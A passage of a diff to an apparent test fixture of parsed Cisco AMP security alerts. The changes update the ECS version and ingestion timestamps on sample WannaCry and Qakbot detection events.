Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558978\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -4092,7 +4092,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4124,7 +4124,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843660456Z", + "ingested": "2021-09-13T18:07:04.510420342Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419303565650559000,\"timestamp\":1610652549,\"timestamp_nanoseconds\":399000000,\"date\":\"2021-01-14T19:29:09+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419303565650558977\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":768,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -4176,7 +4176,7 @@ { "@timestamp": "2021-01-14T19:10:32.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4194,7 +4194,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:31:29.843662300Z", + "ingested": "2021-09-13T18:07:04.510422223Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662859016176000,\"timestamp\":1610651432,\"timestamp_nanoseconds\":199000000,\"date\":\"2021-01-14T19:10:32+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6412662859016176000", "kind": "alert" @@ -4231,7 +4231,7 @@ { "@timestamp": "2021-01-14T19:10:31.000Z", "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4249,7 +4249,7 @@ "event": { "severity": 0, "action": "Policy Update", - "ingested": "2021-09-12T17:31:29.843664186Z", + "ingested": "2021-09-13T18:07:04.510424077Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662854721208000,\"timestamp\":1610651431,\"timestamp_nanoseconds\":856000000,\"date\":\"2021-01-14T19:10:31+00:00\",\"event_type\":\"Policy Update\",\"event_type_id\":553648130,\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}}}}", "id": "6412662854721208000", "kind": "alert" @@ -4291,7 +4291,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4311,7 +4311,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843666081Z", + "ingested": "2021-09-13T18:07:04.510425946Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":233000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4366,7 +4366,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4386,7 +4386,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843667970Z", + "ingested": "2021-09-13T18:07:04.510427827Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4441,7 +4441,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4461,7 +4461,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843669890Z", + "ingested": "2021-09-13T18:07:04.510429716Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -4518,7 +4518,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4542,7 +4542,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843671791Z", + "ingested": "2021-09-13T18:07:04.510431561Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241035\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"el2j9fcqj.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\el2j9fcqj.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -4597,7 +4597,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4621,7 +4621,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843673656Z", + "ingested": "2021-09-13T18:07:04.510433405Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241034\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"kepv86368.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\kepv86368.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -4676,7 +4676,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4700,7 +4700,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843675538Z", + "ingested": "2021-09-13T18:07:04.510435245Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6412662850426241000,\"timestamp\":1610651430,\"timestamp_nanoseconds\":218000000,\"date\":\"2021-01-14T19:10:30+00:00\",\"event_type\":\"Retrospective Detection\",\"event_type_id\":553648147,\"detection\":\"W32.D177E09A9A-95.SBX.TG\",\"detection_id\":\"6412662850426241033\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_3\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"02:2f:e0:10:03:5d\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"uqlq0o884.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\johndoe\\\\AppData\\\\Local\\\\Temp\\\\uqlq0o884.exe\",\"identity\":{\"sha256\":\"d177e09a9ae147741a3ef8b5d3aa9c359d70d602d32f2c4bb0e2d3208cdca446\"}}}}", "kind": "alert", "action": "Retrospective Detection", @@ -4753,7 +4753,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -4773,7 +4773,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843677434Z", + "ingested": "2021-09-13T18:07:04.510437110Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Quarantine Failure\",\"event_type_id\":2164260880,\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Quarantine Failure", @@ -4839,7 +4839,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4869,7 +4869,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843679334Z", + "ingested": "2021-09-13T18:07:04.510438994Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281601187807000,\"timestamp\":1610647435,\"timestamp_nanoseconds\":891000000,\"date\":\"2021-01-14T18:03:55+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.24D004A104-95.SBX.TG\",\"detection_id\":\"6419281601187807332\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\WINDOWS\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -4939,7 +4939,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -4971,7 +4971,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843681225Z", + "ingested": "2021-09-13T18:07:04.510440850Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":396000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"mssecsvc.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Windows\\\\mssecsvc.exe\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\",\"sha1\":\"e889544aff85ffaf8b0d0da705105dee7c97fe26\",\"md5\":\"db349b97c37d22f5ea1d1841e3c89eb4\"},\"parent\":{\"process_id\":708,\"disposition\":\"Clean\",\"file_name\":\"lsass.exe\",\"identity\":{\"sha256\":\"26f36ca31a1b977685f8df5f8436848b7d4143b47ec0dae68f8382c1b52a6c71\",\"sha1\":\"7abcc82dc5a05b4f53fd0fbd386738e5555025cf\",\"md5\":\"4e568dbe3fff1a0025eb432dc929b78f\"}}}}}", "kind": "alert", "action": "Threat Detected", @@ -5028,7 +5028,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5048,7 +5048,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:29.843683113Z", + "ingested": "2021-09-13T18:07:04.510442708Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6419281588302905000,\"timestamp\":1610647432,\"timestamp_nanoseconds\":927000000,\"date\":\"2021-01-14T18:03:52+00:00\",\"event_type\":\"Threat Quarantined\",\"event_type_id\":553648143,\"detection_id\":\"6419281588302905443\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_WannaCry_Ransomware\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"53:74:31:cb:37:50\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"24d004a104d4d54034dbcffc2a4b19a11f39008a575aa614ea04703480b1022c\"}}}}", "kind": "alert", "action": "Threat Quarantined", @@ -5099,7 +5099,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5119,7 +5119,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843684983Z", + "ingested": "2021-09-13T18:07:04.510444555Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068995\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5174,7 +5174,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ @@ -5194,7 +5194,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:29.843686880Z", + "ingested": "2021-09-13T18:07:04.510446430Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\",\"prev\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=0\"},\"results\":{\"total\":972,\"current_item_count\":472,\"index\":500,\"items_per_page\":500}},\"data\":{\"id\":6411538569722069000,\"timestamp\":1610646679,\"timestamp_nanoseconds\":495000000,\"date\":\"2021-01-14T17:51:19+00:00\",\"event_type\":\"Retrospective Quarantine Attempt Failed\",\"event_type_id\":2164260893,\"detection_id\":\"6411538569722068994\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"error\":{\"error_code\":3221225524,\"description\":\"Object name not found\"},\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Qakbot_1\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"f9:65:da:22:2a:41\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"bac7bc52812bc63745d4c5904d18e1581e4f0c821b4cf8336c8dd8eab86385ff\"}}}}", "kind": "alert", "action": "Retrospective Quarantine Attempt Failed", @@ -5249,7 +5249,7 @@ } }, "ecs": { - 